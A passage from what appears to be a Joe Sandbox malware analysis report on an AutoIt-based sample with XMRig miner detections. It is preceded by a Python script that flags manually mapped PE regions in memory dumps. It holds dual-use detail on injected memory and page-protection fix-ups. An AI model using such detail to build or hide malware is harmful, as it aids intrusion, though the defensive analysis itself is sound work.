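The entry above is the one worth a second look in this listing: its functions come from the dump at 000002453CA20000 rather than from the file-backed module at 00007FF7AA0F0000, the report flags that dump as "based on PE: true", and the strings (VirtualProtect / VirtualQuery failures, "has no image-section") are page-protection fix-ups that run when a PE has been written into memory by hand. The dump file names encode the region's Windows page protection and region type, so they can be triaged mechanically. The following is an added example, not code from the Joe Sandbox report or from Joe Security; the field layout it decodes (5th dot-separated field = page protection, 7th = region type) is an assumption inferred from the names on this page, whose values match the documented PAGE_* and MEM_* constants exactly, and the remaining numeric fields are left undecoded. The "based on PE" flag is read from the report text, not from the file name, so it is passed in by the caller.

```python
"""Decode Joe Sandbox ``*.sdmp`` memory-dump names and flag executable, PE-shaped
regions that are not backed by a loaded image (the footprint of a manually
mapped / injected payload). Added example; field layout is an assumption."""
from dataclasses import dataclass

# Documented winnt.h constants (not assumed).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXECUTABLE_PROTECTS = {0x10, 0x20, 0x40, 0x80}


@dataclass(frozen=True)
class DumpRegion:
    process_index: int      # assumed: 1st field (0x11 == 17 on this page)
    base: int               # assumed: 4th field, region base address
    protect: int            # assumed: 5th field, PAGE_* value
    region_type: int        # assumed: 7th field, MEM_* value
    pe_backed: bool         # the report's own "based on PE: true/false"

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect, f"0x{self.protect:x}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.region_type, f"0x{self.region_type:x}")

    def is_suspicious(self) -> bool:
        """Executable memory holding a PE that the loader did not map as MEM_IMAGE."""
        return (self.pe_backed
                and self.protect in EXECUTABLE_PROTECTS
                and self.region_type != 0x1000000)


def parse_sdmp(name: str, pe_backed: bool = False) -> DumpRegion:
    """Split an sdmp file name into its fields; only the fields we understand are kept."""
    stem = name[:-len(".sdmp")] if name.lower().endswith(".sdmp") else name
    fields = stem.split(".")
    if len(fields) != 8:
        raise ValueError(f"unexpected sdmp name: {name!r}")
    return DumpRegion(
        process_index=int(fields[0], 16),
        base=int(fields[3], 16),
        protect=int(fields[4], 16),
        region_type=int(fields[6], 16),
        pe_backed=pe_backed,
    )


def triage(entries):
    """entries: iterable of (sdmp_name, pe_backed). Returns the suspicious regions."""
    return [r for r in (parse_sdmp(n, pe) for n, pe in entries) if r.is_suspicious()]


# Constructed sample: the two dump names that appear in the listing above.
SAMPLE = [
    ("00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp", True),
    ("00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp", True),
]

if __name__ == "__main__":
    for region in triage(SAMPLE):
        print(f"pid#{region.process_index} {region.base:#018x} "
              f"{region.protect_name} {region.type_name} <- unmapped PE in executable memory")
```

On the sample, the image region at 00007FF7AA0F1000 decodes to PAGE_EXECUTE_READ / MEM_IMAGE (a normally loaded module, including its read-only header and write-copy .data pages in the associated dumps) and is not reported, while 000002453CA20000 decodes to PAGE_EXECUTE_READWRITE / MEM_PRIVATE with a PE inside it and is. Anything the script flags should then be carved from the dump and compared against the XMRig detections listed at the top of the report.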
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: IconLoad_invalid_parameter_noinfo
                                                                                                      • String ID: blank$info$question$stop$warning
                                                                                                      • API String ID: 4060274358-404129466
                                                                                                      • Opcode ID: b636dc1b51594c2af202ed54f4e4bdeb97e8f240ec4436fd1e847df07db7b1d4
                                                                                                      • Instruction ID: 74ad813c167c4f4b7c451bad72653ed0343d09ebb897e01adf549144a15c9e8c
                                                                                                      • Opcode Fuzzy Hash: b636dc1b51594c2af202ed54f4e4bdeb97e8f240ec4436fd1e847df07db7b1d4
                                                                                                      • Instruction Fuzzy Hash: 96216D21A4E782E1FA12BB16F94017AE271AF447C0F8650B5DD0E867B6DF7CE8038321
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleLoadModuleString$Messagewprintf
                                                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                                                      • API String ID: 4051287042-3128320259
                                                                                                      • Opcode ID: 02e40095ef40720f69863dbac7a2070404752031add831b0985804f9b4f72438
                                                                                                      • Instruction ID: 7d2be805b5a5d502c88c428a4a8743cb591baaba97c4943fd57c993d8883b33a
                                                                                                      • Opcode Fuzzy Hash: 02e40095ef40720f69863dbac7a2070404752031add831b0985804f9b4f72438
                                                                                                      • Instruction Fuzzy Hash: 9B115271B1DB81E1E736AB10F4457EAA270FB88798FC1047AD64E42A68DE7CC156C760
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                      • String ID:
                                                                                                      • API String ID: 1211466189-0
                                                                                                      • Opcode ID: e1e2e441c9291e36cebb6767608181e9d23d9b0bd25b43b6ce96c6e1de2e754f
                                                                                                      • Instruction ID: 6509c4bc33e8c1433bfe861c41e2a70644608689cb674bff870bdcdd7620f8a5
                                                                                                      • Opcode Fuzzy Hash: e1e2e441c9291e36cebb6767608181e9d23d9b0bd25b43b6ce96c6e1de2e754f
                                                                                                      • Instruction Fuzzy Hash: 0EA1F27671A683E2F76AAF25E144779B6B0FB44B84F525075DA0A43AB0DF3CE8528310
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ShowWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 1268545403-0
                                                                                                      • Opcode ID: 87c66640600301fc3614396531e44b743e01540278fec1b87f8964912ffd81f2
                                                                                                      • Instruction ID: 89eb89b5272c50dd45bd61e2240fa0caa8318eaf460e19437bad30f1164dd71e
                                                                                                      • Opcode Fuzzy Hash: 87c66640600301fc3614396531e44b743e01540278fec1b87f8964912ffd81f2
                                                                                                      • Instruction Fuzzy Hash: 5A51C9B1B1E193E5FB67BB29F44837C96759F81F44F9A40B9C50E422B5CE2CA486C324
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 3864802216-0
                                                                                                      • Opcode ID: 9674a36d8164cb560b58a036ea6f3e8bd8e6a73e44ede240e929598dcb41685d
                                                                                                      • Instruction ID: c28e33d98efecb6b204d9cf9e9dfda54deedd9db487d4ace0aa17957707e9a7a
                                                                                                      • Opcode Fuzzy Hash: 9674a36d8164cb560b58a036ea6f3e8bd8e6a73e44ede240e929598dcb41685d
                                                                                                      • Instruction Fuzzy Hash: 8141BB72619681DBE7218B22F440B6ABBB1F788BD5F554035EF8A07B68DF3DD4418B00
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: fputc
                                                                                                      • String ID:
                                                                                                      • API String ID: 1992160199-0
                                                                                                      • Opcode ID: 57ca36df8b249a8f9d5f541ac5ada4a75b700afd3f56804cb7cb8ab337eae962
                                                                                                      • Instruction ID: a828610ea31b2b2ca24c7f33d726fc3b7e3d8cd5f7a513cd41f4cac8d5618b56
                                                                                                      • Opcode Fuzzy Hash: 57ca36df8b249a8f9d5f541ac5ada4a75b700afd3f56804cb7cb8ab337eae962
                                                                                                      • Instruction Fuzzy Hash: F2E14133200A718BF7768E1AD599B6ABBF1E744792F444199CFD7C6AC2D628E9C1C700
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: 329cf7ad438edc5c76dcb0b9fad9cd181248692e257404cd766d6ec6700348b5
                                                                                                      • Instruction ID: 9cc0728cf2781fec62ed7013d006435687a016e4d12af6c78d0e1726960b7071
                                                                                                      • Opcode Fuzzy Hash: 329cf7ad438edc5c76dcb0b9fad9cd181248692e257404cd766d6ec6700348b5
                                                                                                      • Instruction Fuzzy Hash: 4EC1D722E0E682D5FAEAAF15F44027DAAF1AF40790F964175DA4E077B5CE3DE4468330
                                                                                                      APIs
                                                                                                      • #77.OLEAUT32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF7AA170CA8,?,?,00000000,00007FF7AA1886CF), ref: 00007FF7AA17133B
                                                                                                      • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF7AA170CA8,?,?,00000000,00007FF7AA1886CF), ref: 00007FF7AA171391
                                                                                                      • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF7AA170CA8,?,?,00000000,00007FF7AA1886CF), ref: 00007FF7AA171478
                                                                                                      • #24.OLEAUT32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF7AA170CA8,?,?,00000000,00007FF7AA1886CF), ref: 00007FF7AA17149F
                                                                                                      • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF7AA170CA8,?,?,00000000,00007FF7AA1886CF), ref: 00007FF7AA1714B0
                                                                                                      • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF7AA170CA8,?,?,00000000,00007FF7AA1886CF), ref: 00007FF7AA17151E
                                                                                                      • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF7AA170CA8,?,?,00000000,00007FF7AA1886CF), ref: 00007FF7AA171593
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2585bf9d99523b85a6387ebb36db1e93d42442dc18b734288afeab1606f91b78
                                                                                                      • Instruction ID: bd44453023475d90d9e0fc0fb14a7ed7def4b5ae19396ffb744fdd8ab1da8929
                                                                                                      • Opcode Fuzzy Hash: 2585bf9d99523b85a6387ebb36db1e93d42442dc18b734288afeab1606f91b78
                                                                                                      • Instruction Fuzzy Hash: 72A1CF32E0A612E5FB12AB55E4403BCA771BB44B94F866075DE0E576B1EF3CD842CB60
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                                                      • String ID:
                                                                                                      • API String ID: 3225163088-0
                                                                                                      • Opcode ID: d06d4cd1a423281fa7bfc3dd395589592d26c066c60ef58400709c52517d685a
                                                                                                      • Instruction ID: 3747ed4540f5cf73a98db7a24d1a0fdae0e0151591d23297b352def3cfaf7607
                                                                                                      • Opcode Fuzzy Hash: d06d4cd1a423281fa7bfc3dd395589592d26c066c60ef58400709c52517d685a
                                                                                                      • Instruction Fuzzy Hash: FCA1DE73A0D2C2C7E7649F19A44066EFB71FB89B98F910125EA8913B69DB3CD452CB10
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: fputc$memset
                                                                                                      • String ID: 0
                                                                                                      • API String ID: 2944404495-4108050209
                                                                                                      • Opcode ID: 723778ab5f5ed4e9e21dd96fdce46ca5edcb99c65d494b752cf8bca5d62af410
                                                                                                      • Instruction ID: b58d599bfab7c8031eaf55b20d701a805e026b5c3310f1a85621df41d5d3415c
                                                                                                      • Opcode Fuzzy Hash: 723778ab5f5ed4e9e21dd96fdce46ca5edcb99c65d494b752cf8bca5d62af410
                                                                                                      • Instruction Fuzzy Hash: 8D811363B42AB447F73B9E26E18877E6EE2E714790F049195CEE756AC3D238D8C08700
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSendWindow$Enabled
                                                                                                      • String ID:
                                                                                                      • API String ID: 3694350264-0
                                                                                                      • Opcode ID: afb273491b6871b9358392d720659e4730aaef88e09809c522e030074b87f941
                                                                                                      • Instruction ID: 2eda33ff800c8b5b4a3815e265ad6bdfc98527a981c7024f3839f560447fc382
                                                                                                      • Opcode Fuzzy Hash: afb273491b6871b9358392d720659e4730aaef88e09809c522e030074b87f941
                                                                                                      • Instruction Fuzzy Hash: 9B91B671E0AA46EAF7F6AB15F4403B9B3B1AF44754F864072CA4C036B1DE3DE5968720
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                      • String ID:
                                                                                                      • API String ID: 161812096-0
                                                                                                      • Opcode ID: 2e0c978de7f3949c5e4fef75b6087ee8ddd4ddcc90206a13e30e68fd27cedf73
                                                                                                      • Instruction ID: 6fc7b9114c4a697826da64adb95d052e36186b21e18b05c708003620d7fee922
                                                                                                      • Opcode Fuzzy Hash: 2e0c978de7f3949c5e4fef75b6087ee8ddd4ddcc90206a13e30e68fd27cedf73
                                                                                                      • Instruction Fuzzy Hash: 8B413836A0AB01E5F751AF62E4806AC77B6FB84B98F964076DE0D53764CF38E446C710
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                                                      • String ID: Msctls_Progress32
                                                                                                      • API String ID: 1025951953-3636473452
                                                                                                      • Opcode ID: 769d822a731d8b4ab9969762f95a8256fd4e8cf9c5dd72bf7c6db143b8f84875
                                                                                                      • Instruction ID: 3fc1b201e252340ac490708cea2ad1ab25e1a817fa8ce140feb082634db30428
                                                                                                      • Opcode Fuzzy Hash: 769d822a731d8b4ab9969762f95a8256fd4e8cf9c5dd72bf7c6db143b8f84875
                                                                                                      • Instruction Fuzzy Hash: 51315736A0D691DBE3609F25F494B1AB761EB88794F509239EB8903F68CF3CD446CB10
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Create$Show
                                                                                                      • String ID: AutoIt v3$d$edit
                                                                                                      • API String ID: 2813641753-2600919596
                                                                                                      • Opcode ID: 0ad88fc629bd0e984a014ea89d123ec5e352ad141f26ec72c70a003d1c95128a
                                                                                                      • Instruction ID: d7971d46acedb8f5e775292f1c2d7c63a76e59569967e39d556f518b20edbeb6
                                                                                                      • Opcode Fuzzy Hash: 0ad88fc629bd0e984a014ea89d123ec5e352ad141f26ec72c70a003d1c95128a
                                                                                                      • Instruction Fuzzy Hash: 79214972A19B41DBF751DB10F448369B3B0F7887A9F920238E68D46A64CF7DD145CB14
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 3220332590-0
                                                                                                      • Opcode ID: 18d3220a09dc32d3d71dcb14d157741ee50ede115eaee0b264565a3d31b006b7
                                                                                                      • Instruction ID: 9fe2cd5850a5e85ce89957eacb3e9e853d459da3fca83fb477540ae332bd4bf6
                                                                                                      • Opcode Fuzzy Hash: 18d3220a09dc32d3d71dcb14d157741ee50ede115eaee0b264565a3d31b006b7
                                                                                                      • Instruction Fuzzy Hash: 74A101A7A1A253C6F725AF75D4407BEB3B0FB04B18F415036DE1A57AA4FA399802D320
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
